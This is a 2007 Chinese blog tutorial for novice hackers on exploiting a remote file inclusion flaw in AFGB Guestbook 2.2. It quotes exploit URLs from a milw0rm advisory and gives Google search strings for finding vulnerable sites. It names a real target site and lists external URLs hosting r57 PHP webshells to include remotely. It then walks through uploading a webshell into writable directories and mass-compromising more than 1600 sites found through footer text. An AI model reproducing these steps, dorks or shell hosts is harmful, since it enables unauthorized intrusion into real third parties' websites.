在本文你可以学到:
1、    怎样利用已知漏洞
2、    远程包含漏洞入侵整个过程
一、    菜鸟的感慨:
    唉!为什么我们就是不能自己找到别人没有找到的漏洞呢?别人找到漏洞了,写文章就写一大片的理论知识,让我们望而生畏 ,高深啊,岂是我们一般菜鸟所能理解!
    一大群菜鸟垂头丧气的从看似高深而时间简单的漏洞前走过,我们不禁呼喊:“高手啊!你就发发慈悲,给我们机会吧,让我们尝尝坠入洞中的滋味吧”可是却只剩下那让人没有人理睬的声音在遥远的天空回荡。
    说起那些做教程的高手,他们让我们我们只是看到他入侵或提权过程,却不给我们他们找漏洞的整个过程,我们看完了他的教程,却不知道何去何从。
跟着他们的步骤入侵同一个网站吧,网站不是关掉了,就是漏洞已经补上。。。。更有甚者,在网站漏洞的页面挂上木马,可耻啊!让我们沦为他们的肉鸡,让我们在担惊受怕中徘徊。做黑客,怎么可以无耻到这种地步?上天啊,求求你给我一个可以机会吧,我们用渴望的眼神望着上帝,希望他给我们提示。。。。于是。。。。《黑客手册下凡》
二 、菜鸟找漏洞
        作为菜鸟的我不甘这样忍受高手的蹂躏,我要冲破束缚,翱翔在shell 的天空,这里我非常感谢我亲爱的google、百度、以及其它搜索引擎,是他们给了我们希望,给我们莫大的帮助,今天我们就让我们的 google 大和百度大叔闪亮登场,开始找洞洞的旅程吧!
    首先在百度里输入“远程包含漏洞原理”这句关键字一搜,呵呵!要教程有教程,要文章有文章,我就不在多说了,2007年的第一期的《黑手》有详细的介绍,这里我简要说一下,其实远程包含漏洞就是 程序文件中的变量过滤不严可以远程包含并执行我们的php文件。
    至于找程序的漏洞,对于我们菜鸟来说是比较高深的,但是,利用已经知道的漏洞也不行吗?那也太菜了,继续操作。。。。。。多搜索一些教程和文章来看看,发现一打把介绍的文章和利用的利用方法,可是都没有提示我找到漏洞站点的思路,很多都找不到利用的站点,无意中看了个教程,做的是入侵台湾留言本的步骤,从教程上得到信息有:漏洞出现的页面一个留言本的add.php 没有过滤的变量Htmls,既然漏洞出来了,我就要仔细的研究了。
在 google里输入“add.php?Htmls=”作为关键字进行搜索, 得到下图 1
 
500)this.width=500" border=0>
                                                         图1
进入博客找到我要的信息:
AFGB GUESTBOOK 2.2 (Htmls) Remote File Include Vulnerabilities
2006-10-13 08:19:54
大中小
#        afgb GUESTBOOK V2.2                          #
#      Htmls Remote File Include Vulnerability        #
#                      Turkish Hacker\'s              #
#      Discovered By : mdX                            #
#                                                      #
#------------------------------------------------------
#              Cyber-Warrior TIM                      #
#        Ay ve  YIldIzlar Geceye YakISIr...          #
#        the moon and the stars suit the night        #
########################################################
#
# Class : REmote
########################################################
#            File Code Detailed
#File :add.php?,admin.php?,look.php?,re.php
#
#Code :
#
#include \"$Htmls\";
########################################################
#
#
# Exploit : http://www.target.***/[path]/add.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/admin.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/look.php?Htmls=http://shell.txt?
# Exploit : http://www.target.***/[path]/re.php?Htmls=http://shell.txt?
########################################################
#                        _ThankX_
#
#
#
#Cyber-warrior User ,PROHACK, Siber-korsanlar [redx, dipsomania, k.z.l_alev]
#Shika, xoron , real_dark_boy, All Friends
########################################################
download link :http://www.afgb.to/
# milw0rm.com [2006-10-12]
现在我知道了含有漏洞文件的程序名称版本号afgb GUESTBOOK V2.2,而且让我的得很有用的站点http://www.milw0rm.com/exploits里面公布很多的漏洞如图二,希望菜鸟们到里面找到有用信息通过google、百度等搜索引擎快速拿站抓鸡吧
500)this.width=500" border=0>
                                 图2
三.顺利的拿下一批webshell
通过前面得到的信息和google等搜索引擎的配合得到漏洞的站点,这次我们在google中搜索关键字“afgb GUESTBOOK V2.2”,如图3
500)this.width=500" border=0>
                                                                                 图3
找到漏洞站点了,进去逛逛吧!来到漏洞站点http://bookgb1.xoops.twpopo.com/,如图4。
500)this.width=500" border=0>
                                        图4
至于这个程序的漏洞利用方法,这里要用到一个php木马的地址我知道的有三个:(http://www.sagi.net.cn/php.txt国内的)(http://hack-viyu.h16.ru/shell/r57shell.txt国外的r57shell)(http://pang0.by.ru/shall/pang057.zz也是r57的 ),提示注意图4和图五浏览器的区别!
500)this.width=500" border=0>
                                        图5
按照图5地址栏所示,电击浏览器的转到按钮,或直接按enter键,出现如图6 的信息
500)this.width=500" border=0>
                                图6
这样就成功一半了,找可以写的目录上传我们的php木马
看下图7中其中r表示有读的权限,w 表示有写的权限,x 表示有执行的权限
500)this.width=500" border=0>
      图7
找到一个可以写的路径到我们的上传的地方上传我们的木马,上传的地方如图8:
                          图8
500)this.width=500" border=0> 
上传成功后运行我的木马,如图9。

500)this.width=500" border=0>
下面的图10、图11、图12、图13是几个具有漏洞的站点,大家可以测试一下。
500)this.width=500" border=0>
                                      图10
500)this.width=500" border=0>
                                      图11
500)this.width=500" border=0>
                                图12
500)this.width=500" border=0>
                            图13
啊哈!找到了webshell网站,如图14、图15。
500)this.width=500" border=0>
                                图14



500)this.width=500" border=0>
                                图15
四、菜鸟广泛入侵
  入侵本应该到此结束,可是这样不符合我做人的习惯,就象拔草,要把拔要连根拔起,呵呵,废话少说,先看了看这个留言本,并且把它下载到本地进行了分析,找特殊的页面在google 里搜索了 一下,效果并不理想 。
我把刚才得到的几个网站分析了下,共同点是,在首页的底部有版权信息为:程式设计:过往云烟 [V2.2] ,看来以这个为关键字得到一大批有漏洞的站点,接着我用  程式设计:过往云烟 [V2.1]也发现几个有漏洞的网站
有1600多项
随便试一个(截图 )图16、图17、图18、图19。
500)this.width=500" border=0>
                                                         图16
500)this.width=500" border=0>
                                                            图17
500)this.width=500" border=0>
                                                               图18
五 菜鸟总结:
  这次入侵实际没有用到什么新鲜的技术,都是陈旧的,通过这篇文章我知识想告诉大家,人家发现了漏洞,我们就要通过社会工程学把战果扩大,虽然技术简单,但是思路要保持灵活嘛!


posted on 2007-09-07 09:26  间歇博客  阅读(564)  评论(0编辑  收藏  举报